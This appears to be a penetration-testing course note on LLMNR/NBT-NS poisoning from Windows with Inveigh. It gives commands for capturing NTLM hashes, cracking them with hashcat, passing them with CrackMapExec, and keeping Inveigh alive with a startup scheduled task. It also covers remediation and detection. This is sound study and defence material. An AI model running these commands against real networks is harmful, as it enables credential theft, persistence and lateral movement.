4.LLMNR-NBT-NS Poisoning - from Windows

1. Inveigh Overview:

Purpose: A Windows-based tool for LLMNR/NBT-NS poisoning, similar to Responder.
Languages: Written in PowerShell and C#.
Protocols: Supports LLMNR, DNS, mDNS, NBNS, DHCPv6, ICMPv6, HTTP, HTTPS, SMB, LDAP, WebDAV, and Proxy Auth.
Availability: Found in the C:\Tools directory on the provided Windows attack host.
Versions:
- PowerShell (original, no longer updated)
- C# (InveighZero, maintained by the author)

2. Using Inveigh (PowerShell):

Importing the Module:

Import-Module .\Inveigh.ps1

Listing Parameters:

(Get-Command Invoke-Inveigh).Parameters

Running Inveigh:

Invoke-Inveigh -NBNS Y -ConsoleOutput Y -FileOutput Y

Enables NBNS spoofing, console output, and file output.
Displays enabled/disabled options, captured LLMNR and mDNS requests, SMB negotiation, and NTLM challenges.
Saves output to the C:\Tools directory.

Stopping Inveigh (PowerShell):

Stop-Inveigh

3. Using Inveigh (C# - InveighZero):

Execution:

.\Inveigh.exe

Output:

Displays enabled/disabled options.
Indicates successful and failed listeners.
Captures LLMNR requests.

Interactive Console:

Press ESC to enter the interactive console.
Use the HELP command for a list of available console commands.

Common Commands:

GET NTLMV2UNIQUE - Displays unique captured NTLMv2 hashes.
GET NTLMV2USERNAMES - Displays captured usernames.

4. Inveigh Console Commands:

GET CONSOLE
GET DHCPv6Leases
GET LOG
GET NTLMV1
GET NTLMV2
GET NTLMV1UNIQUE
GET NTLMV2UNIQUE
GET NTLMV1USERNAMES
GET NTLMV2USERNAMES
GET CLEARTEXT
GET CLEARTEXTUNIQUE
GET REPLYTODOMAINS
GET REPLYTOHOSTS
GET REPLYTOIPS
GET REPLYTOMACS
GET IGNOREDOMAINS
GET IGNOREHOSTS
GET IGNOREIPS
GET IGNOREMACS
SET CONSOLE
HISTORY
RESUME
STOP

5. Remediation:

Disable LLMNR:

Group Policy:
- Computer Configuration -> Administrative Templates -> Network -> DNS Client -> "Turn OFF Multicast Name Resolution."

Disable NBT-NS:

Navigate to:
- Network and Sharing Center -> Change adapter settings -> Adapter properties -> Internet Protocol Version 4 (TCP/IPv4) -> Advanced -> WINS -> Disable NetBIOS over TCP/IP.

PowerShell GPO Startup Script:

$regkey = "HKLM:SYSTEM\CurrentControlSet\services\NetBT\Parameters\Interfaces"
Get-ChildItem $regkey |foreach { Set-ItemProperty -Path "$regkey\$($_.pschildname)" -Name NetbiosOptions -Value 2 -Verbose}

Deploy using Group Policy Management.

Other Mitigations:

Filtering network traffic.
Enabling SMB Signing.
Using network intrusion detection and prevention systems.
Implementing network segmentation.

6. Detection:

Honeypotting: Inject LLMNR/NBT-NS requests for non-existent hosts.
Traffic Monitoring: Monitor ports UDP 5355 and 137.
Event Log Monitoring: Focus on Event IDs 4697 and 7045.
Registry Monitoring:
- HKLM\Software\Policies\Microsoft\Windows NT\DNSClient\EnableMulticast (0 = disabled)
Sysmon: Monitor for suspicious process creations or network connections.

7. Post-Capture Actions:

Enumeration:

Use BloodHound for analyzing captured hashes.

Hash Cracking with Hashcat:

hashcat -m 5600 captured_hashes.txt rockyou.txt --force

Identify Hash Types:

hashid captured_hash.txt

Using CrackMapExec for Exploitation:

crackmapexec smb <target-ip> -u <username> -H <hash>

Password Spraying:

Employ password spraying techniques if hash cracking is unsuccessful.

8. Automation Example (Scheduled Task for Persistence):

$Action = New-ScheduledTaskAction -Execute 'powershell.exe' -Argument '-File "C:\Tools\Inveigh.ps1"'
$Trigger = New-ScheduledTaskTrigger -AtStartup
Register-ScheduledTask -Action $Action -Trigger $Trigger -TaskName "InveighPersistence" -Description "Auto-start Inveigh for LLMNR/NBT-NS Poisoning"

9. Real-World Workflow Example:

Launch Inveigh to capture hashes.
Use Hashcat to crack captured NTLMv2 hashes.
Attempt lateral movement using cracked credentials with CrackMapExec.
Continue enumeration or privilege escalation as needed.

10. Defensive Recommendation Summary:

Disable LLMNR and NBT-NS protocols.
Enforce SMB signing.
Monitor network traffic for suspicious poisoning attempts.
Implement strict network segmentation and authentication controls.

Previous3. LLMNR-NBT-NS Poisoning - from Linux Next3.Sighting In, Hunting For A User

Last updated 12 days ago

$regkey = "HKLM:SYSTEM\CurrentControlSet\services\NetBT\Parameters\Interfaces" Get-ChildItem $regkey |foreach { Set-ItemProperty -Path "$regkey\$($_.pschildname)" -Name NetbiosOptions -Value 2 -Verbose}

$Action = New-ScheduledTaskAction -Execute 'powershell.exe' -Argument '-File "C:\Tools\Inveigh.ps1"' $Trigger = New-ScheduledTaskTrigger -AtStartup Register-ScheduledTask -Action $Action -Trigger $Trigger -TaskName "InveighPersistence" -Description "Auto-start Inveigh for LLMNR/NBT-NS Poisoning"